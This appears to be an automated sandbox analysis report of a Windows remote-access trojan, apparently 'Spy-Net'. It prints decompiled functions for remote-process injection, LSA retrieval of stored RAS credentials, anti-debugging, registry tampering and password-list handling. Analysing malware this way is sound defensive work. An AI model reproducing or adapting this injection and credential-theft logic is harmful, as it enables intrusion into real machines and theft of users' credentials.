                                    • GetWindowThreadProcessId.USER32(00000000,?), ref: 0040AFF3
                                    • OpenProcess.KERNEL32(001F0FFF,00000000,?,00000000,0040B062), ref: 0040B003
                                      • Part of subcall function 0040AEBC: VirtualAllocEx.KERNEL32(00000000,00000000,00000000,00003000,00000040), ref: 0040AED4
                                      • Part of subcall function 0040AEBC: VirtualProtectEx.KERNEL32(00000000,00000000,00000000,00000040,00000040,00000000,00000000,00000000,00003000,00000040), ref: 0040AEE5
                                      • Part of subcall function 0040AEBC: WriteProcessMemory.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00000040,00000040,00000000,00000000,00000000,00003000,00000040), ref: 0040AEF3
                                      • Part of subcall function 0040AF08: GetModuleHandleA.KERNEL32(00000000), ref: 0040AF20
                                      • Part of subcall function 0040AF08: VirtualFreeEx.KERNEL32(00000000,?,00000000,00008000,?,00000000), ref: 0040AF4A
                                      • Part of subcall function 0040AF08: VirtualAllocEx.KERNEL32(00000000,?,?,00003000,00000040,00000000,?,00000000,00008000,?,00000000), ref: 0040AF59
                                      • Part of subcall function 0040AF08: GetModuleHandleA.KERNEL32(00000000,?,?,00000000,?,?,00003000,00000040,00000000,?,00000000,00008000,?,00000000), ref: 0040AF6C
                                      • Part of subcall function 0040AF08: WriteProcessMemory.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,00003000,00000040,00000000,?,00000000,00008000), ref: 0040AF74
                                      • Part of subcall function 0040AF08: CreateRemoteThread.KERNEL32(00000000,00000000,00000000,?,?,00000000,00000000), ref: 0040AF95
                                      • Part of subcall function 0040AF08: CloseHandle.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,?,00000000,00000000,?,?,00000000,?), ref: 0040AF9B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000009.00000002.554462336.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000009.00000002.554444506.0000000000400000.00000002.00020000.sdmp
                                    • Associated: 00000009.00000002.554509749.0000000000410000.00000040.00020000.sdmp
                                    • Associated: 00000009.00000002.554595376.0000000000414000.00000040.00020000.sdmp
                                    • Associated: 00000009.00000002.555075872.0000000000451000.00000080.00020000.sdmp
                                    • Associated: 00000009.00000002.555106907.0000000000456000.00000004.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: ProcessVirtual$HandleModule$AllocMemoryThreadWindowWrite$CloseCreateFileFindFreeNameOpenProtectRemote
                                    • String ID: Shell_TrayWnd
                                    • API String ID: 1977168033-2988720461
                                    • Opcode ID: a52c62318053698575c4eba3688c10b841fefbfd621b91d5bb385f6faa68fac7
                                    • Instruction ID: a49b11f00c6fdd64156e7e0e0219d8fdfe2ddc0dda215ebd071a12db30bd13ac
                                    • Opcode Fuzzy Hash: a52c62318053698575c4eba3688c10b841fefbfd621b91d5bb385f6faa68fac7
                                    • Instruction Fuzzy Hash: 8C116D70B502086BDB01EBB58C42A9E76A8EB48704F60497AB410F73D1EA789E04879C
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 45%
                                    			E00407E40(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
                                    				signed short* _v8;
                                    				intOrPtr _v12;
                                    				char _v16;
                                    				void* _t23;
                                    				intOrPtr _t50;
                                    				intOrPtr _t58;
                                    				void* _t59;
                                    
                                    				_t59 = __eflags;
                                    				_t55 = __esi;
                                    				_t54 = __edi;
                                    				_t41 = __ebx;
                                    				_push(0);
                                    				_push(0);
                                    				_push(0);
                                    				_push(_t58);
                                    				_push(0x407ef8);
                                    				_push( *[fs:eax]);
                                    				 *[fs:eax] = _t58;
                                    				_push("RasDialParams!");
                                    				E00407CAC( &_v16, __ebx, __ecx);
                                    				_push(_v16);
                                    				_push(0x407f24);
                                    				E00401E10();
                                    				_t23 = E00407DD0(4,  &_v8, _v12, _t59);
                                    				_t60 = _t23;
                                    				if(_t23 != 0) {
                                    					E00407B94(_v8[2], __ebx,  *_v8 & 0x0000ffff, __edi, __esi);
                                    					_push(_v8[2]);
                                    					L00407B74();
                                    				}
                                    				if(E00407DD0(4,  &_v8, "L$_RasDefaultCredentials#0", _t60) != 0) {
                                    					E00407B94(_v8[2], _t41,  *_v8 & 0x0000ffff, _t54, _t55);
                                    					_push(_v8[2]);
                                    					L00407B74();
                                    				}
                                    				_pop(_t50);
                                    				 *[fs:eax] = _t50;
                                    				_push(E00407EFF);
                                    				return E00401AE4( &_v16, 2);
                                    			}

                                    Instruction addresses (one per statement above): 0x00407e40, 0x00407e40, 0x00407e40, 0x00407e40, 0x00407e43, 0x00407e45, 0x00407e47, 0x00407e4b, 0x00407e4c, 0x00407e51, 0x00407e54, 0x00407e57, 0x00407e5f, 0x00407e64, 0x00407e67, 0x00407e74, 0x00407e84, 0x00407e89, 0x00407e8b, 0x00407e99, 0x00407ea4, 0x00407ea5, 0x00407ea5, 0x00407ebe, 0x00407ecc, 0x00407ed7, 0x00407ed8, 0x00407ed8, 0x00407edf, 0x00407ee2, 0x00407ee5, 0x00407ef7

                                    APIs
                                      • Part of subcall function 00407CAC: GetUserNameA.ADVAPI32(00000000,000000FF), ref: 00407CF3
                                      • Part of subcall function 00407CAC: LookupAccountNameA.ADVAPI32(00000000,00000000,?,000000FF,?,000000FF,?), ref: 00407D2F
                                      • Part of subcall function 00407CAC: IsValidSid.ADVAPI32(?,00000000,000000FF,00000000,00407D81), ref: 00407D3F
                                      • Part of subcall function 00407CAC: ConvertSidToStringSidA.ADVAPI32(?,?), ref: 00407D53
                                      • Part of subcall function 00407CAC: GlobalFree.KERNEL32(?), ref: 00407D66
                                      • Part of subcall function 00407DD0: LsaOpenPolicy.ADVAPI32(00000000,?,00000004), ref: 00407DF8
                                      • Part of subcall function 00407DD0: LsaRetrievePrivateData.ADVAPI32(?,?,?), ref: 00407E17
                                      • Part of subcall function 00407DD0: LsaClose.ADVAPI32(00000000), ref: 00407E2E
                                    • LsaFreeMemory.ADVAPI32(?), ref: 00407EA5
                                    • LsaFreeMemory.ADVAPI32(?), ref: 00407ED8
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000009.00000002.554462336.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000009.00000002.554444506.0000000000400000.00000002.00020000.sdmp
                                    • Associated: 00000009.00000002.554509749.0000000000410000.00000040.00020000.sdmp
                                    • Associated: 00000009.00000002.554595376.0000000000414000.00000040.00020000.sdmp
                                    • Associated: 00000009.00000002.555075872.0000000000451000.00000080.00020000.sdmp
                                    • Associated: 00000009.00000002.555106907.0000000000456000.00000004.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: Free$MemoryName$AccountCloseConvertDataGlobalLookupOpenPolicyPrivateRetrieveStringUserValid
                                    • String ID: L$_RasDefaultCredentials#0$RasDialParams!
                                    • API String ID: 3536555734-4131767963
                                    • Opcode ID: 7244b0321237c455948edbdb93282e145ed4da0237b3fe86ec9488f9e6135b81
                                    • Instruction ID: 051c29abe3561fe595ca9589d677eda25b311890e2a2b38154f2da2c0a53b43f
                                    • Opcode Fuzzy Hash: 7244b0321237c455948edbdb93282e145ed4da0237b3fe86ec9488f9e6135b81
                                    • Instruction Fuzzy Hash: 8911C934A08248AFDB00DB95C942F9DB7F5EB48704F6084F6F900A77D2D638BE05DA5A
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 58%
                                    			E00405AD8(void* __eax, void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                    				_Unknown_base(*)()* _t6;
                                    				void* _t8;
                                    				void* _t14;
                                    				void* _t15;
                                    
                                    				_t14 = __ecx;
                                    				_t15 = __edx;
                                    				_t8 = __eax;
                                    				_t6 = GetProcAddress(LoadLibraryA("shell32.dll"), "ShellExecuteA");
                                    				return  *_t6(_t8, _t15, _t14, _a12, _a8, _a4);
                                    			}

                                    Instruction addresses (one per statement above): 0x00405ade, 0x00405ae0, 0x00405ae2, 0x00405af4, 0x00405b0e

                                    APIs
                                    • LoadLibraryA.KERNEL32(shell32.dll,ShellExecuteA), ref: 00405AEE
                                    • GetProcAddress.KERNEL32(00000000,shell32.dll), ref: 00405AF4
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000009.00000002.554462336.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000009.00000002.554444506.0000000000400000.00000002.00020000.sdmp
                                    • Associated: 00000009.00000002.554509749.0000000000410000.00000040.00020000.sdmp
                                    • Associated: 00000009.00000002.554595376.0000000000414000.00000040.00020000.sdmp
                                    • Associated: 00000009.00000002.555075872.0000000000451000.00000080.00020000.sdmp
                                    • Associated: 00000009.00000002.555106907.0000000000456000.00000004.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: AddressLibraryLoadProc
                                    • String ID: ShellExecuteA$shell32.dll
                                    • API String ID: 2574300362-4013357483
                                    • Opcode ID: 70672a5890152c1e78ef8b0d6a8ba5b8b829c768844e900c89825be7bf6273f8
                                    • Instruction ID: f0fdb292883bcfe093ec2198a563b102d7430bdd074e61d60e743b8a46e47796
                                    • Opcode Fuzzy Hash: 70672a5890152c1e78ef8b0d6a8ba5b8b829c768844e900c89825be7bf6273f8
                                    • Instruction Fuzzy Hash: 70E086723006143B9710EEDB9C41C9BBBACDEC9B64310C53BB508972519475AD0186F8
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 58%
                                    			E0040562C() {
                                    				void* _t5;
                                    				struct HINSTANCE__* _t6;
                                    				intOrPtr* _t7;
                                    				intOrPtr* _t8;
                                    
                                    				_t5 = 0;
                                    				_t6 = LoadLibraryA("kernel32.dll");
                                    				if(_t6 != 0) {
                                    					_t8 = GetProcAddress(_t6, "IsDebuggerPresent");
                                    					_t7 = _t8;
                                    					if(_t8 != 0) {
                                    						_t5 =  *_t7();
                                    					}
                                    				}
                                    				return _t5;
                                    			}

                                    Instruction addresses (one per statement above): 0x00405630, 0x0040563c, 0x00405640, 0x0040564d, 0x0040564f, 0x00405653, 0x00405657, 0x00405657, 0x00405653, 0x0040565f

                                    APIs
                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,?,?,00000000,004056C8,00000000,0040B22C,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4), ref: 00405637
                                    • GetProcAddress.KERNEL32(00000000,IsDebuggerPresent), ref: 00405648
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000009.00000002.554462336.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000009.00000002.554444506.0000000000400000.00000002.00020000.sdmp
                                    • Associated: 00000009.00000002.554509749.0000000000410000.00000040.00020000.sdmp
                                    • Associated: 00000009.00000002.554595376.0000000000414000.00000040.00020000.sdmp
                                    • Associated: 00000009.00000002.555075872.0000000000451000.00000080.00020000.sdmp
                                    • Associated: 00000009.00000002.555106907.0000000000456000.00000004.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: AddressLibraryLoadProc
                                    • String ID: IsDebuggerPresent$kernel32.dll
                                    • API String ID: 2574300362-2078679533
                                    • Opcode ID: 0f2c0815cd8c1a43d894b1d06190de4a79993326b8e6ff8f207f4119a9c4f690
                                    • Instruction ID: 709391d187db73d1dcda7b1af944ced4f983b45a8e89d04e37376b255e5d8423
                                    • Opcode Fuzzy Hash: 0f2c0815cd8c1a43d894b1d06190de4a79993326b8e6ff8f207f4119a9c4f690
                                    • Instruction Fuzzy Hash: 4AD0121634561C2982313CE91C85F275A4CC5C5665799093BB508A2381DDAB4C0559A8
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E004069E4(void* __ecx, char* __edx) {
                                    				void* _v8;
                                    				char* _t7;
                                    				void** _t11;
                                    
                                    				_t7 = __edx;
                                    				RegOpenKeyExA(0x80000001, "Software\\Microsoft\\Active Setup\\Installed Components\\", 0, 0x20006, _t11);
                                    				RegDeleteKeyA(_v8, _t7);
                                    				return RegCloseKey(_v8);
                                    			}

                                    Instruction addresses (one per statement above): 0x004069e6, 0x004069fa, 0x00406a05, 0x00406a15

                                    APIs
                                    • RegOpenKeyExA.ADVAPI32(80000001,Software\Microsoft\Active Setup\Installed Components\,00000000,00020006,?,?,?,00406AF1), ref: 004069FA
                                    • RegDeleteKeyA.ADVAPI32(?), ref: 00406A05
                                    • RegCloseKey.ADVAPI32(00000000,80000001,Software\Microsoft\Active Setup\Installed Components\,00000000,00020006,?,?,?,00406AF1), ref: 00406A0E
                                    Strings
                                    • Software\Microsoft\Active Setup\Installed Components\, xrefs: 004069F0
                                    Memory Dump Source
                                    • Source File: 00000009.00000002.554462336.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000009.00000002.554444506.0000000000400000.00000002.00020000.sdmp
                                    • Associated: 00000009.00000002.554509749.0000000000410000.00000040.00020000.sdmp
                                    • Associated: 00000009.00000002.554595376.0000000000414000.00000040.00020000.sdmp
                                    • Associated: 00000009.00000002.555075872.0000000000451000.00000080.00020000.sdmp
                                    • Associated: 00000009.00000002.555106907.0000000000456000.00000004.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: CloseDeleteOpen
                                    • String ID: Software\Microsoft\Active Setup\Installed Components\
                                    • API String ID: 3399588633-1337323248
                                    • Opcode ID: 282679c8ea14fe7c5e13c97754bf3c3aaaeff35f8cdc94346c9d03bd774ac319
                                    • Instruction ID: e40fb9d213039d93dcec3c1e8996a1bef626a17aa7b52359fc93130613ad7c1e
                                    • Opcode Fuzzy Hash: 282679c8ea14fe7c5e13c97754bf3c3aaaeff35f8cdc94346c9d03bd774ac319
                                    • Instruction Fuzzy Hash: FBD0A7B07443003AE110BAD65C83F1B268CC7C8745F10442A7104BB0C2C4789D000579
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 58%
                                    			E00405E60(void* __eax, void* __edx) {
                                    				_Unknown_base(*)()* _t3;
                                    				void* _t5;
                                    				void* _t7;
                                    
                                    				_t7 = __edx;
                                    				_t5 = __eax;
                                    				_t3 = GetProcAddress(LoadLibraryA("kernel32.dll"), "GetWindowsDirectoryA");
                                    				return  *_t3(_t5, _t7);
                                    			}

                                    Instruction addresses (one per statement above): 0x00405e62, 0x00405e64, 0x00405e76, 0x00405e81

                                    APIs
                                    • LoadLibraryA.KERNEL32(kernel32.dll,GetWindowsDirectoryA,?,?,00405FAE,00000000,00405FEF), ref: 00405E70
                                    • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00405E76
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000009.00000002.554462336.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000009.00000002.554444506.0000000000400000.00000002.00020000.sdmp
                                    • Associated: 00000009.00000002.554509749.0000000000410000.00000040.00020000.sdmp
                                    • Associated: 00000009.00000002.554595376.0000000000414000.00000040.00020000.sdmp
                                    • Associated: 00000009.00000002.555075872.0000000000451000.00000080.00020000.sdmp
                                    • Associated: 00000009.00000002.555106907.0000000000456000.00000004.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: AddressLibraryLoadProc
                                    • String ID: GetWindowsDirectoryA$kernel32.dll
                                    • API String ID: 2574300362-157430550
                                    • Opcode ID: eaea27decea16d5132e662f6b3d6d1e327edaddf7cadff529396c82a7d7f61a7
                                    • Instruction ID: 4b7778617931093bb27523e6f2e67fe50c24fa97b8e3c3713106166120904923
                                    • Opcode Fuzzy Hash: eaea27decea16d5132e662f6b3d6d1e327edaddf7cadff529396c82a7d7f61a7
                                    • Instruction Fuzzy Hash: F7C08CB120162039D9203AF60C82EAB094CCC8426A32008337408F22C284BE0E0000FC
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 58%
                                    			E00405E18(void* __eax, void* __edx) {
                                    				_Unknown_base(*)()* _t3;
                                    				void* _t5;
                                    				void* _t7;
                                    
                                    				_t7 = __edx;
                                    				_t5 = __eax;
                                    				_t3 = GetProcAddress(LoadLibraryA("kernel32.dll"), "GetSystemDirectoryA");
                                    				return  *_t3(_t5, _t7);
			}

                                    0x00405e1a
                                    0x00405e1c
                                    0x00405e2e
                                    0x00405e39

                                    APIs
                                    • LoadLibraryA.KERNEL32(kernel32.dll,GetSystemDirectoryA,?,?,00405F22,00000000,00405F63), ref: 00405E28
                                    • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00405E2E
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000009.00000002.554462336.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000009.00000002.554444506.0000000000400000.00000002.00020000.sdmp
• Associated: 00000009.00000002.554509749.0000000000410000.00000040.00020000.sdmp
• Associated: 00000009.00000002.554595376.0000000000414000.00000040.00020000.sdmp
• Associated: 00000009.00000002.555075872.0000000000451000.00000080.00020000.sdmp
• Associated: 00000009.00000002.555106907.0000000000456000.00000004.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: AddressLibraryLoadProc
                                    • String ID: GetSystemDirectoryA$kernel32.dll
                                    • API String ID: 2574300362-261809815
                                    • Opcode ID: 47b9e16137c7ae96d6a2bc759c8bd7e7168d98e07d0b0e8878cbeb5beabce437
                                    • Instruction ID: c580b32cc06898864e96a6d997c1f25460584718cb9bf05ade4b506b0c3faeb4
                                    • Opcode Fuzzy Hash: 47b9e16137c7ae96d6a2bc759c8bd7e7168d98e07d0b0e8878cbeb5beabce437
                                    • Instruction Fuzzy Hash: 0AC08CB120162035EA203AF60C8AE9B094CCC8466632008337018F22C384BE4E0000FC
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • LoadLibraryA.KERNEL32(?), ref: 24070A9A
                                    • GetProcAddress.KERNEL32(?,2406BFF9), ref: 24070AAF
                                    • VirtualProtect.KERNEL32(24010000,00001000,00000004,?,00000000), ref: 24070B0E
                                    • VirtualProtect.KERNEL32(24010000,00001000), ref: 24070B23
                                    Memory Dump Source
                                    • Source File: 00000009.00000002.557923102.0000000024054000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
• Associated: 00000009.00000002.557888717.0000000024010000.00000002.00000001.sdmp
• Associated: 00000009.00000002.558206540.0000000024071000.00000004.00000001.sdmp
                                    Similarity
                                    • API ID: ProtectVirtual$AddressLibraryLoadProc
                                    • String ID:
                                    • API String ID: 3300690313-0
                                    • Opcode ID: 207e314284d24766e709e71cd3f6ddb3aa093c89f9feb9ecd714ec3fcf37e27d
                                    • Instruction ID: fea73935ac89edb1ecb1ad068de3a124fb3e9058189b3824ae919782244a9029
                                    • Opcode Fuzzy Hash: 207e314284d24766e709e71cd3f6ddb3aa093c89f9feb9ecd714ec3fcf37e27d
                                    • Instruction Fuzzy Hash: AB512972A553525AE3118A78CCC0E95BBF0EB42234F180778C6E5C73C7E7A459858B6B
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E004058E0(struct tagMSG* __eax) {
                                    				long _t7;
                                    				MSG* _t8;
                                    
                                    				_t8 = __eax;
                                    				_t7 = 0;
                                    				if(PeekMessageA(__eax, 0, 0, 0, 1) != 0) {
                                    					_t7 = 1;
                                    					if(_t8->message != 0x12) {
                                    						TranslateMessage(_t8);
                                    						DispatchMessageA(_t8);
                                    					}
                                    				}
                                    				Sleep(1);
                                    				return _t7;
			}

                                    0x004058e2
                                    0x004058e4
                                    0x004058f6
                                    0x004058f8
                                    0x004058fe
                                    0x00405901
                                    0x00405907
                                    0x00405907
                                    0x004058fe
                                    0x0040590e
                                    0x00405917

                                    APIs
                                    • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 004058EF
                                    • TranslateMessage.USER32 ref: 00405901
                                    • DispatchMessageA.USER32 ref: 00405907
                                    • Sleep.KERNEL32(00000001,?,00000000,00405922), ref: 0040590E
                                    Memory Dump Source
                                    • Source File: 00000009.00000002.554462336.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000009.00000002.554444506.0000000000400000.00000002.00020000.sdmp
• Associated: 00000009.00000002.554509749.0000000000410000.00000040.00020000.sdmp
• Associated: 00000009.00000002.554595376.0000000000414000.00000040.00020000.sdmp
• Associated: 00000009.00000002.555075872.0000000000451000.00000080.00020000.sdmp
• Associated: 00000009.00000002.555106907.0000000000456000.00000004.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: Message$DispatchPeekSleepTranslate
                                    • String ID:
                                    • API String ID: 3768732053-0
                                    • Opcode ID: d6ab4591d5ae237bab473a8afd9d438f801d83b33db59c6d5a5b392af26336c7
                                    • Instruction ID: 6e183c8d27a73f5ab686f93293f9443bc1ab9610ab5d407b35826ec629df393a
                                    • Opcode Fuzzy Hash: d6ab4591d5ae237bab473a8afd9d438f801d83b33db59c6d5a5b392af26336c7
                                    • Instruction Fuzzy Hash: B9E012B13836147DF63079650C83F9F594C8F02B9AF54453BF201BB2C2C5AA5E0041AD
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E0040BA84(void* __eflags) {
                                    				void* _t7;
                                    
                                    				_t7 = E00403568(0, 0, "_x_X_BLOCKMOUSE_X_x_");
                                    				if(GetLastError() != 0xb7) {
                                    					CloseHandle(_t7);
                                    					return 1;
                                    				} else {
                                    					CloseHandle(_t7);
                                    					return 0;
                                    				}
			}

                                    0x0040ba93
                                    0x0040ba9f
                                    0x0040baac
                                    0x0040bab4
                                    0x0040baa1
                                    0x0040baa2
                                    0x0040baaa
                                    0x0040baaa

                                    APIs
                                      • Part of subcall function 00403568: CreateMutexA.KERNEL32(?,?,?,?,?), ref: 0040357E
                                    • GetLastError.KERNEL32(00000000,0040BEF8,0000000E,Function_0000B108,00400000,00000000,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040BA95
                                    • CloseHandle.KERNEL32(00000000,00000000,0040BEF8,0000000E,Function_0000B108,00400000,00000000,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040BAA2
                                    • CloseHandle.KERNEL32(00000000,00000000,0040BEF8,0000000E,Function_0000B108,00400000,00000000,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040BAAC
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000009.00000002.554462336.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000009.00000002.554444506.0000000000400000.00000002.00020000.sdmp
• Associated: 00000009.00000002.554509749.0000000000410000.00000040.00020000.sdmp
• Associated: 00000009.00000002.554595376.0000000000414000.00000040.00020000.sdmp
• Associated: 00000009.00000002.555075872.0000000000451000.00000080.00020000.sdmp
• Associated: 00000009.00000002.555106907.0000000000456000.00000004.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: CloseHandle$CreateErrorLastMutex
                                    • String ID: _x_X_BLOCKMOUSE_X_x_
                                    • API String ID: 2372642624-2341447584
                                    • Opcode ID: 1a8c2dc209660b13ed4db7da09b804a36426b86662114a7581cc9a960c290bce
                                    • Instruction ID: d02ee9e762f20a6f0fe939e11bc02ca9e1bd7b756de2d39ced16b1d78259e861
                                    • Opcode Fuzzy Hash: 1a8c2dc209660b13ed4db7da09b804a36426b86662114a7581cc9a960c290bce
                                    • Instruction Fuzzy Hash: 97D0C9A174534035E910B9B51CC3B0E050C875071BFA01837B104BA1D3D67D8601262D
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Executed Functions

                                    C-Code - Quality: 77%
                                    			E24056188(void* __ebx, void* __edx, void* __edi, void* __esi) {
                                    				char _v68;
                                    				char _v72;
                                    				char _v76;
                                    				char _v80;
                                    				char _v84;
                                    				char _v88;
                                    				char _v92;
                                    				char _v96;
                                    				char _v100;
                                    				char _v104;
                                    				char _v108;
                                    				char _v112;
                                    				char _v116;
                                    				char _v120;
                                    				char _v124;
                                    				intOrPtr _t43;
                                    				intOrPtr* _t63;
                                    				char* _t64;
                                    				intOrPtr* _t68;
                                    				void* _t71;
                                    				char* _t75;
                                    				char* _t76;
                                    				char* _t83;
                                    				intOrPtr* _t84;
                                    				intOrPtr _t87;
                                    				char* _t89;
                                    				intOrPtr* _t90;
                                    				intOrPtr* _t91;
                                    				intOrPtr* _t92;
                                    				intOrPtr* _t96;
                                    				void* _t101;
                                    				void* _t103;
                                    				char* _t104;
                                    				void** _t106;
                                    				void** _t109;
                                    				void* _t118;
                                    				void* _t127;
                                    				intOrPtr* _t140;
                                    				void* _t142;
                                    				intOrPtr* _t143;
                                    				intOrPtr _t155;
                                    				intOrPtr* _t164;
                                    				intOrPtr* _t168;
                                    				intOrPtr* _t171;
                                    				intOrPtr _t176;
                                    				void* _t178;
                                    				intOrPtr* _t179;
                                    				void* _t206;
                                    				void** _t209;
                                    				intOrPtr* _t213;
                                    				void* _t221;
                                    				void* _t222;
                                    				void** _t259;
                                    				intOrPtr _t268;
                                    				void** _t273;
                                    				intOrPtr* _t290;
                                    				intOrPtr* _t298;
                                    				void** _t300;
                                    				intOrPtr* _t303;
                                    				intOrPtr _t305;
                                    				intOrPtr _t306;
                                    
                                    				_t301 = __edi;
                                    				_t220 = __ebx;
                                    				_t305 = _t306;
                                    				_t222 = 0xf;
                                    				goto L1;
                                    				L4:
                                    				_t64 =  *0x2405ac50; // 0x2405b948
                                    				if( *_t64 != 1) {
                                    					L8:
                                    					DeleteFileA(E24013534( *0x240637ac));
                                    					_t68 =  *0x2405ac14; // 0x2405b94c
                                    					_t71 = E24014F18(0, 0, E24013534( *_t68));
                                    					_t259 =  *0x2405ab38; // 0x2405b990
                                    					 *_t259 = _t71;
                                    					if(GetLastError() == 0xb7) {
                                    						ExitProcess(0);
                                    					}
                                    					CreateThread(0, 0, E24054C04, 0, 0, 0x240637b8); // executed
                                    					CreateThread(0, 0, E240551BC, 0, 0, 0x240637b8);
                                    					_t75 =  *0x2405ac5c; // 0x2405b94a
                                    					if( *_t75 == 1) {
                                    						E240115E0(0,  &_v80);
                                    						E24013480( *_t303, _v80);
                                    						if(0 != 0) {
                                    							E2401757C( *_t303, _t220, _t303, 0);
                                    							E24016588( *_t303, _t220,  &_v84, _t301, _t303, 0);
                                    							E24017668(_v84, _t220, 0);
                                    						}
                                    					}
                                    					_t76 =  *0x2405ab74; // 0x2405b949
                                    					if( *_t76 == 1) {
                                    						E240115E0(0,  &_v88);
                                    						E24013480( *_t303, _v88);
                                    						if(0 != 0) {
                                    							E24017728( *_t303, _t220, _t303, 0);
                                    							E24016588( *_t303, _t220,  &_v92, _t301, _t303, 0);
                                    							E24017728(_v92, _t220, _t303, 0);
                                    						}
                                    					}
                                    					E24015C1C(GetCurrentProcessId(), _t230); // executed
                                    					E24015B30(); // executed
                                    					E240167F8( &_v96, _t220, _t303, 0); // executed
                                    					_push(_v96);
                                    					_push(0x240567cc);
                                    					_push("logs.dat");
                                    					E240133FC();
                                    					_t83 =  *0x2405abac; // 0x2405b918
                                    					_t316 =  *_t83 - 1;
                                    					if( *_t83 != 1) {
                                    						L23:
                                    						_t84 =  *0x2405ac44; // 0x240572fc
                                    						 *_t84 = 0;
                                    						E24044448(0, _t220,  &_v116, _t303); // executed
                                    						_t87 =  *0x2405ac60; // 0x2405b988
                                    						E240130DC(_t87, _v116);
                                    						_t89 =  *0x2405abe8; // 0x2405b964
                                    						if( *_t89 == 1) {
                                    							_t230 = 0;
                                    							E240178C8(0x24055c64, 0, 0);
                                    						}
                                    						_t90 =  *0x2405ab1c; // 0x2405b960
                                    						if( *_t90 != 0) {
                                    							_t230 = 0;
                                    							E240178C8(E240533BC, 0, 0);
                                    						}
                                    						_t91 =  *0x2405ac08; // 0x2405ca58
                                    						 *_t91 = 0;
                                    						_t92 =  *0x2405ab70; // 0x2405ca54
                                    						 *_t92 = 0x13;
                                    						E240167F8( &_v120, _t220, _t303, 0); // executed
                                    						_push(_v120);
                                    						_push(0x240567cc);
                                    						_push("SQLite3.dll");
                                    						E240133FC();
                                    						_t96 =  *0x2405ab6c; // 0x2405b968
                                    						_t324 =  *_t96;
                                    						if( *_t96 != 0) {
                                    							E24053A04();
                                    							E240158BC( &_v124, _t230, 0, GetCurrentProcessId(), 0);
                                    							E24016858(0x80000001, _t220, "PIDprocess", "SOFTWARE\\Microsoft\\", _t303, _t324, _v124);
                                    							_t127 = E24014F18(0, 0, "SPY_NET_RATMUTEX");
                                    							_t273 =  *0x2405ac38; // 0x2405b994
                                    							 *_t273 = _t127;
                                    							E240178C8(E24055DD4, 0, 0);
                                    						}
                                    						E240178C8(E240500AC, 0, 0);
                                    						E240178C8(E240382AC, 0, 0);
                                    						_t101 = E24014F18(0, 0, "_x_X_PASSWORDLIST_X_x_"); // executed
                                    						_t221 = _t101;
                                    						_t103 = E24016C78( *_t303, _t221, 0); // executed
                                    						if(_t103 == 1) {
                                    							_t118 = E240166E4(0, E24013534( *_t303), "open", 1, 0, 0); // executed
                                    							if(_t118 > 0x20) {
                                    								Sleep(0x3e8); // executed
                                    								CloseHandle(_t221);
                                    							}
                                    						}
                                    						while(1) {
                                    							_t104 =  *0x2405ab14; // 0x2405aa50
                                    							if( *_t104 != 0) {
                                    								break;
                                    							}
                                    							E24038298();
                                    						}
                                    						_t106 =  *0x2405ab38; // 0x2405b990
                                    						CloseHandle( *_t106);
                                    						_t109 =  *0x2405ac38; // 0x2405b994
                                    						CloseHandle( *_t109);
                                    						Sleep(0x2ee0);
                                    						L35:
                                    						_pop(_t268);
                                    						 *[fs:eax] = _t268;
                                    						_push(0x2405674d);
